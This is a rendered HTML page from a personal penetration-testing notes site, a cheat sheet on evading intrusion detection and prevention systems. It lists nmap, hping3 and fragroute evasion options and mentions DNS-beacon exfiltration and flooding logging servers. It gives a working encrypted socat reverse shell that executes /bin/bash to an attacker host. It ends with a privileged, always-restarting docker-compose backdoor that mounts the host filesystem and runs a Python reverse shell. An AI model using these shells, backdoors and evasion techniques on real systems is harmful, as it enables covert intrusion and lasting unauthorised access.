husk/build/post exploitation/docs/ids_ips_evation.html

<!doctype html>
<html lang="en">
    <center>
    <head>
        
    
        <script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script type="text/javascript" src="/static/js/auto-complete.js"></script>
        <script type="text/javascript" src="/static/js/lunr.min.js"></script>
        <script type="text/javascript" src="/static/js/search.js"></script>
        <link rel="stylesheet" href="/static/stylesheet.css">
        <link rel="stylesheet" href="/static/auto-complete.css">
        <br>
        <title>The Real Hugo</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        

    </head>
    <body>
        <!-- topmenu -->
    <div class="menu">
    <a href="/" style="text-decoration:none">Husk</a>
    </div>
    <div class="search-container">    
        <label for="search-by"><i class="fas fa-search"></i></label>
        <input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
        <!--button type="submit"><i class="search"></i>&#128269;</button>-->
        <span data-search-clear=""><i class="fas fa-times"></i></span>
    </div>

</div>
    <div class="menu">
    </div>
    <!--br><br-->
    </center>
<p></p>
        <div class="columns">
        <!-- Sidebar -->
<div class="column column-1">
  <ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="l
</ul>
</div>
<div class="column column-2"> 
       <span class="body">
           <style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#ids-ips-evation">IDS &amp; IPS Evation</a><ul>
<li><a href="#enumeration">Enumeration</a><ul>
<li><a href="#nmap">nmap</a></li>
<li><a href="#nikto">nikto</a></li>
</ul>
</li>
<li><a href="#protocol-manipulation">Protocol Manipulation</a><ul>
<li><a href="#relying-on-another-protocol">Relying on another protocol</a></li>
<li><a href="#manipulation-of-the-sources-or-lhosts-network-port">Manipulation of the source's or LHOST's network port</a></li>
<li><a href="#session-splicing-by-fragmentation-and-segmentation">Session splicing by fragmentation and segmentation</a></li>
<li><a href="#sending-invalid-packets">Sending invalid packets</a></li>
</ul>
</li>
<li><a href="#payload-manipulation">Payload Manipulation</a><ul>
<li><a href="#obfuscation-and-encoding">Obfuscation and Encoding</a></li>
<li><a href="#encrypting-communication-channels">Encrypting Communication Channels</a></li>
<li><a href="#modification-of-data">Modification of Data</a></li>
</ul>
</li>
<li><a href="#route-manipulation">Route Manipulation</a><ul>
<li><a href="#relying-on-source-routing">Relying on Source Routing</a></li>
<li><a href="#using-proxyy-servers">Using Proxyy Servers</a></li>
</ul>
</li>
<li><a href="#tactical-dos">Tactical DoS</a></li>
<li><a href="#misc">MISC</a></li>
<li><a href="#backdoors">Backdoors</a><ul>
<li><a href="#docker">Docker</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<h1 id="ids-ips-evation">IDS &amp; IPS Evation</h1>
<ul>
<li>Evation by manipulation of <ul>
<li>Tool parameters</li>
<li>Protocol</li>
<li>Payload</li>
<li>Route</li>
<li>Or DoS</li>
</ul>
</li>
</ul>
<h2 id="enumeration">Enumeration</h2>
<ul>
<li><a href="https://developers.whatismybrowser.com/useragents/explore/">User-Agents</a></li>
</ul>
<h3 id="nmap">nmap</h3>
<ul>
<li><code>--script-args http.useragent="&lt;user-agent&gt;"</code></li>
<li><code>-Ss</code> half open</li>
</ul>
<h3 id="nikto">nikto</h3>
<ul>
<li><code>-useragent &lt;user-agent&gt;</code></li>
<li>Tuning <code>-T 1 2 3</code></li>
<li><strong>NOT</strong><code>-evasion &lt;encoding-technique&gt;</code>, it increases detection</li>
</ul>
<h2 id="protocol-manipulation">Protocol Manipulation</h2>
<h3 id="relying-on-another-protocol">Relying on another protocol</h3>
<ul>
<li><code>nc -ulvnp 4711</code> for listening to incoming UDP traffic</li>
<li><code>nc -u $TARGET_IP $TARGET_PORT</code> for connecting through UDP</li>
</ul>
<h3 id="manipulation-of-the-sources-or-lhosts-network-port">Manipulation of the source's or LHOST's network port</h3>
<ul>
<li><code>nmap -g 80</code> or <code>nmap --source-port 53</code> to send outgoing nmap traffic through it</li>
</ul>
<h3 id="session-splicing-by-fragmentation-and-segmentation">Session splicing by fragmentation and segmentation</h3>
<ul>
<li><code>nmap</code> fragmentation in 8 bytes <code>-f</code>, 16 bytes <code>-ff</code>, <code>--mtu &lt;size&gt;</code> for MTU  </li>
<li>Use <a href="https://www.monkey.org/~dugsong/fragroute/">Fragroute</a> with <code>ip_frag &lt;num&gt;</code> in <code>fragroute.conf</code>, then use <code>fragroute -f fragroute.conf $TARGET_IP</code></li>
</ul>
<h3 id="sending-invalid-packets">Sending invalid packets</h3>
<ul>
<li>Invalid protocol header flags and checksums via<code>nmap --badsum</code>, <code>nmap --scanflags URG/ACK/PSH/RST/SYN/FIN</code>, e.g. concatentation of multiple flags <code>nmap --scanflags SYNRSTFIN</code></li>
<li><code>hping3</code> including <code>--ttl</code>, <code>--badsum</code>, header flags <code>-S</code>,<code>-A</code>,<code>-P</code>,<code>-U</code>,<code>-F</code>,<code>-R</code></li>
</ul>
<h2 id="payload-manipulation">Payload Manipulation</h2>
<h3 id="obfuscation-and-encoding">Obfuscation and Encoding</h3>
<ul>
<li>Base64 </li>
<li>URL</li>
<li>Escaped Unicode Characters</li>
</ul>
<h3 id="encrypting-communication-channels">Encrypting Communication Channels</h3>
<ul>
<li>Use socat with encryption </li>
</ul>
<div class="codehilite"><pre><span></span><code>openssl req -x509 -newkey rsa:2048 -days <span class="m">356</span> -subj <span class="s1">&#39;/CN=www.example.com/O=YO/C=FR&#39;</span> -nodes -keyout id_rsa.key -out reverse.crt
</code></pre></div>

<ul>
<li>Create <code>.pem</code> (Privacy Enhanced Mail) file via</li>
</ul>
<div class="codehilite"><pre><span></span><code>cat id_rsa.key reverse.crt &gt; reverse.pem
</code></pre></div>

<ul>
<li>Listening on attacker side</li>
</ul>
<div class="codehilite"><pre><span></span><code>socat -d -d OPENSSL-LISTEN:4711,cert<span class="o">=</span>reverse.pem,verify<span class="o">=</span><span class="m">0</span>,fork STDOUT
</code></pre></div>

<ul>
<li>On target </li>
</ul>
<div class="codehilite"><pre><span></span><code>socat OPENSSL:<span class="nv">$ATTACKER_IP</span>:4711,verify<span class="o">=</span><span class="m">0</span> EXEC:/bin/bash
</code></pre></div>

<h3 id="modification-of-data">Modification of Data</h3>
<ul>
<li>Order of parameters, instead of <code>nc -lvnp</code> it is <code>nc -vpnl</code></li>
<li>Adding whitespaces to the commands</li>
<li>Use aliases</li>
</ul>
<h2 id="route-manipulation">Route Manipulation</h2>
<h3 id="relying-on-source-routing">Relying on Source Routing</h3>
<ul>
<li><code>nmap --ip-options "L 10.10.20.30 10.10.30.40</code> routes through these IPs loosely</li>
<li><code>nmap --ip-options "S 10.10.20.30 10.10.30.40"</code> routes through the IPs strictly</li>
</ul>
<h3 id="using-proxyy-servers">Using Proxyy Servers</h3>
<ul>
<li><code>nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP</code></li>
</ul>
<h2 id="tactical-dos">Tactical DoS</h2>
<ul>
<li>Non malicious, benign traffic against <ul>
<li>IDS/IPS</li>
<li>Logging server</li>
</ul>
</li>
</ul>
<h2 id="misc">MISC</h2>
<ul>
<li>Changing <ul>
<li><code>User-Agent</code></li>
<li>Request frequency and duration of sleep </li>
<li>SSL/TLS certs</li>
<li>DNS beacon, storing exfiltrated data in the query</li>
</ul>
</li>
</ul>
<h2 id="backdoors">Backdoors</h2>
<ul>
<li>Backdooring without getting recognized by the IDS/IPS by reading its rules in the config file</li>
</ul>
<h3 id="docker">Docker</h3>
<ul>
<li>Create a <code>docker-compose.yaml</code> file with a reverse shell as an entry point, mount the host volume to <code>/mnt</code> inside the container</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nn">---</span><span class="w"></span>
<span class="nt">version</span><span class="p">:</span><span class="w"> </span><span class="s">&quot;2.1&quot;</span><span class="w"></span>
<span class="nt">services</span><span class="p">:</span><span class="w"></span>
<span class="w">  </span><span class="nt">backdoorservice</span><span class="p">:</span><span class="w"></span>
<span class="w">    </span><span class="nt">restart</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">always</span><span class="w"></span>
<span class="w">    </span><span class="nt">image</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">&lt;Found image&gt;</span><span class="w"></span>
<span class="w">    </span><span class="nt">entrypoint</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">&gt;</span><span class="w"> </span>
<span class="w">       </span><span class="no">python -c &#39;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</span><span class="w"></span>
<span class="w">       </span><span class="no">s.connect((&quot;&lt;$ATTACKER_IP&gt;&quot;,4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);</span><span class="w"></span>
<span class="w">       </span><span class="no">pty.spawn(&quot;/bin/sh&quot;)&#39;</span><span class="w"></span>
<span class="w">    </span><span class="nt">volumes</span><span class="p">:</span><span class="w"></span>
<span class="w">      </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/:/mnt</span><span class="w"></span>
<span class="w">    </span><span class="nt">privileged</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">true</span><span class="w"></span>
</code></pre></div>
        </span>
</div>
</div>
<div id="footer">
         
<p></p>
    <center>
            &copy; Stefan Friese
    </center>
            
        </div>

        <script>
    function linkClick(obj) {
       if (obj.open) {
           //console.log('open');
                       if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
                           sessionStorage.removeItem(obj.id);
                       }
           sessionStorage.setItem(obj.id,"open");
           console.log(obj.id);
       } else {
           //console.log('closed');
            sessionStorage.removeItem(obj.id);
      }
    }

    let _keys = Object.keys(sessionStorage);
    if (_keys) {
       for ( let i = 0; i < _keys.length; i++ ) {
            document.getElementById(_keys[i])['open'] = 'open';
       }
    }
</script>            
    <script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
    <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      config: ["MMLorHTML.js"],
      jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
      extensions: ["MathMenu.js", "MathZoom.js"]
    });
    </script>
    </body>
</html>